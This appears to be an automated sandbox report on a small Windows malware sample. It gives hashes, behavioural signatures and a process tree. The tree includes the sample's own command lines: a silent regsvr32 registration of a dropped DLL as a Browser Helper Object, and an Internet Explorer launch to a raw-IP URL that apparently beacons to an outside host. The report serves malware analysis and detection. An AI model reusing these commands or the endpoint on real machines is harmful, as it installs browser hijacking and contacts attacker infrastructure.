Analysis

  • max time kernel
    103s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/03/2025, 14:32

General

  • Target

    JaffaCakes118_8ac0f510fb9a027c88395b6d3b67b92c.exe

  • Size

    13KB

  • MD5

    8ac0f510fb9a027c88395b6d3b67b92c

  • SHA1

    bcccf1009f8e768b2cc77135120db75277fbd20b

  • SHA256

    2670fe58cc390fac739d2b162bffac5b76be8c32607a39d1a85297c9fd21fb34

  • SHA512

    36407f15b0db86539b7d1bf122730cafa85d965d78c1af06ba0c905d73aac6bcc8141be37f6b055ba89ea19dc9835f71f2ddd2534c778e6556d7af0fcb977744

  • SSDEEP

    192:1jDxvOhd+DyxGy3zzqLrNBW2MwtsY12JpdOEyncjWO3L/eagnldolMmD7:1jDMb+DyE2HqtBMwF1+pgnoLMcZ

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Installs/modifies Browser Helper Object 2 TTPs 2 IoCs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • Drops file in System32 directory 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 27 IoCs
  • Modifies registry class 25 IoCs
  • Suspicious behavior: LoadsDriver 6 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_8ac0f510fb9a027c88395b6d3b67b92c.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_8ac0f510fb9a027c88395b6d3b67b92c.exe"
    1⤵
    • Checks computer location settings
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: RenamesItself
    • Suspicious use of WriteProcessMemory
    PID:908
    • C:\Windows\SysWOW64\regsvr32.exe
      "C:\Windows\System32\regsvr32.exe" /s saristar.dll
      2⤵
      • Loads dropped DLL
      • Installs/modifies Browser Helper Object
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      PID:5960
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://217.73.66.16/md.php?data=JaffaCakes118_8ac0f510fb9a027c88395b6d3b67b92c
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:5848
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5848 CREDAT:17410 /prefetch:2
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2168

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

    Filesize

    471B

    MD5

    0c5ef9158dcdd3b41a7e84c5e760b59d

    SHA1

    9cb930588b30e4399d0fbf73a559b2d89373a6a9

    SHA256

    95c2b916d5668f7823fc9222d4cac008570c4f1866a3ef2b4175cb1ea5bbd9d9

    SHA512

    13cf19b192d4b6365ab09e13b5ffc6c26470ff51527d8e49fad7aa410df5a7bc6557e731d5b49fa7c19cd9b677764422d2f57c10d2578cdfdf91cd1120db9c4e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

    Filesize

    412B

    MD5

    40ea12e4c99bf57f3bca23dab87008be

    SHA1

    ea971372855a1226444fb0946f22ae981e89a8a0

    SHA256

    5258fc436bc5662653767c0632c99fb2621c27d0b5226fb324802e1c6811f944

    SHA512

    8647eec0e1186acf19b5ab03f6bf1c55b178fe06609ca2ed0864bd0c55793881601f6d2b0150c4ef18cec1038297de24181216530a115ab5366b262f4f05d984

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ONPDW741\suggestions[1].en-US

    Filesize

    17KB

    MD5

    5a34cb996293fde2cb7a4ac89587393a

    SHA1

    3c96c993500690d1a77873cd62bc639b3a10653f

    SHA256

    c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

    SHA512

    e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

  • C:\Windows\SysWOW64\saristar.dll

    Filesize

    6KB

    MD5

    9952294f4a7b01fe9c6865ab94ea5f46

    SHA1

    a6a053992f04df0726e3a57f0720ce89fc529dcb

    SHA256

    3f16a8236c8e4e68124ff3da6b34e98069b389e38a183343b6ea6dafd5a7d3c2

    SHA512

    525b199013537f8ea45978059858102495f7b5b98fa5e3ebd07fd1bb3b681d558c98c5f2355642b99adea724a3ca7e4f1fb4962545c2f05255dfaf0cd8e70eb5

  • memory/908-0-0x0000000000400000-0x000000000041E000-memory.dmp

    Filesize

    120KB

  • memory/908-4-0x0000000000400000-0x000000000041E000-memory.dmp

    Filesize

    120KB

  • memory/908-6-0x0000000000400000-0x000000000041E000-memory.dmp

    Filesize

    120KB